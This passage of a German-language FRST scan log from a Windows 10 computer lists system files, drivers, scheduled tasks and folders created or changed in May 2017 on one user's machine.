2017-05-07 18:11 - 2017-05-07 18:11 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02651648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02435584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02298880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01452960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01291776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 01103872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01024416 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00741784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00626520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00311192 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00095584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-05-07 18:09 - 2017-05-07 18:09 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\MSBuild
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\MSBuild
2017-05-07 18:09 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2017-05-07 18:09 - 2017-02-10 12:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2017-05-07 18:09 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2017-05-07 17:23 - 2017-05-23 18:30 - 02078284 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagwrn.xml
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagerr.xml
2017-05-07 17:17 - 2017-05-23 18:25 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-05-07 17:17 - 2017-05-07 21:26 - 00003268 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-05-07 17:17 - 2017-05-07 17:20 - 00004440 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2017-05-07 17:17 - 2017-05-07 17:17 - 00003556 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-05-07 17:17 - 2017-05-07 17:17 - 00003332 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-05-07 17:17 - 2017-05-07 17:17 - 00003282 _____ C:\WINDOWS\System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9}
2017-05-07 17:17 - 2017-05-07 17:17 - 00002668 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
2017-05-07 17:17 - 2017-05-07 17:17 - 00002580 _____ C:\WINDOWS\System32\Tasks\SamsungMagician
2017-05-07 17:17 - 2017-05-07 17:17 - 00002388 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\ASUS
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\ProgramData\USOShared
2017-05-07 17:15 - 2017-05-07 17:15 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-05-07 17:15 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-05-07 17:14 - 2017-05-14 22:59 - 00000000 ____D C:\Users\Dino
2017-05-07 17:14 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Vorlagen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Startmenü
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Netzwerkumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Lokale Einstellungen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Eigene Dateien
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Druckumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Verlauf
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Anwendungsdaten
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Anwendungsdaten
2017-05-07 17:13 - 2017-05-23 18:24 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2017-05-07 17:13 - 2017-05-21 20:55 - 00342672 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-05-07 17:13 - 2017-05-17 21:18 - 00000000 ____D C:\Program Files\AMD
2017-05-07 17:13 - 2017-05-16 18:16 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-05-07 17:13 - 2017-05-07 17:14 - 00000000 ____D C:\Program Files (x86)\ASUS
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_ASMBSW_01_11_00.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_TeeDriverx64_01011.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Realtek
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\ASUS
2017-05-07 17:13 - 2013-07-04 03:32 - 00028672 _____ (ASUSTek Computer Inc.) C:\WINDOWS\SysWOW64\AsIO.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00015232 _____ C:\WINDOWS\SysWOW64\Drivers\AsIO.sys
2017-05-07 13:03 - 2017-05-07 21:24 - 00000000 ___DC C:\WINDOWS\Panther
2017-05-03 17:47 - 2017-05-03 17:47 - 00001256 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Update- und Datenschutzeinstellungen.lnk
2017-05-03 17:47 - 2017-05-03 17:47 - 00000000 ____D C:\Users\Dino\AppData\Local\UNP
2017-05-03 17:21 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-05-03 17:21 - 2017-05-03 17:22 - 00000000 ____D C:\Program Files\UNP
2017-05-01 12:45 - 2017-05-07 17:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard
2017-05-01 12:45 - 2017-05-01 12:45 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\AMD
==================== Ein Monat: Geänderte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-05-23 18:30 - 2017-03-20 06:41 - 00924424 _____ C:\WINDOWS\system32\perfh007.dat
2017-05-23 18:30 - 2017-03-20 06:41 - 00197434 _____ C:\WINDOWS\system32\perfc007.dat
2017-05-23 18:29 - 2017-03-18 13:40 - 00065536 _____ C:\WINDOWS\system32\config\ELAM
2017-05-23 18:25 - 2017-02-05 21:11 - 00000000 ____D C:\Program Files\Bitdefender Agent
2017-05-23 18:25 - 2016-12-06 18:58 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\Mozilla
2017-05-23 18:25 - 2015-08-16 13:47 - 00000000 ___RD C:\Users\Dino\OneDrive
2017-05-23 18:24 - 2017-03-18 13:40 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2017-05-23 18:24 - 2017-02-05 21:38 - 00018061 _____ C:\bdlog.txt
2017-05-23 17:51 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps
2017-05-23 17:51 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-05-23 17:51 - 2015-05-01 17:30 - 132223576 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-05-23 17:51 - 2015-05-01 17:30 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-05-22 18:20 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-05-22 18:14 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-05-21 21:36 - 2015-04-25 17:41 - 00000000 ____D C:\Program Files (x86)\Steam
2017-05-21 20:55 - 2017-02-05 21:39 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-05-21 20:54 - 2017-02-05 21:41 - 00000085 _____ C:\WINDOWS\wininit.ini
2017-05-21 20:54 - 2017-02-05 21:40 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\System
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-05-19 14:20 - 2015-10-30 20:47 - 00000000 ____D C:\WINDOWS\ShellNew
2017-05-19 14:20 - 2013-08-22 15:25 - 00000076 _____ C:\WINDOWS\win.ini
2017-05-19 14:16 - 2017-02-05 20:54 - 00001079 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-05-19 14:16 - 2017-02-05 20:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-05-17 21:18 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF
2017-05-17 21:18 - 2015-04-25 06:40 - 00000000 ____D C:\AMD
2017-05-16 18:06 - 2017-04-14 21:33 - 00924544 _____ (AMD) C:\WINDOWS\system32\coinst_17.10.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00551808 _____ C:\WINDOWS\system32\dgtrayicon.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00546688 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Rapidfire64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00531328 _____ C:\WINDOWS\system32\GameManager64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00478080 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\Rapidfire.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00365440 _____ C:\WINDOWS\SysWOW64\GameManager32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00278400 _____ C:\WINDOWS\system32\clinfo.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00276352 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00242048 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00191360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00169856 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00167808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00150912 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00135040 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00133504 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00044920 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\RapidFireServer64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00042368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\RapidFireServer.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01516416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00777088 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
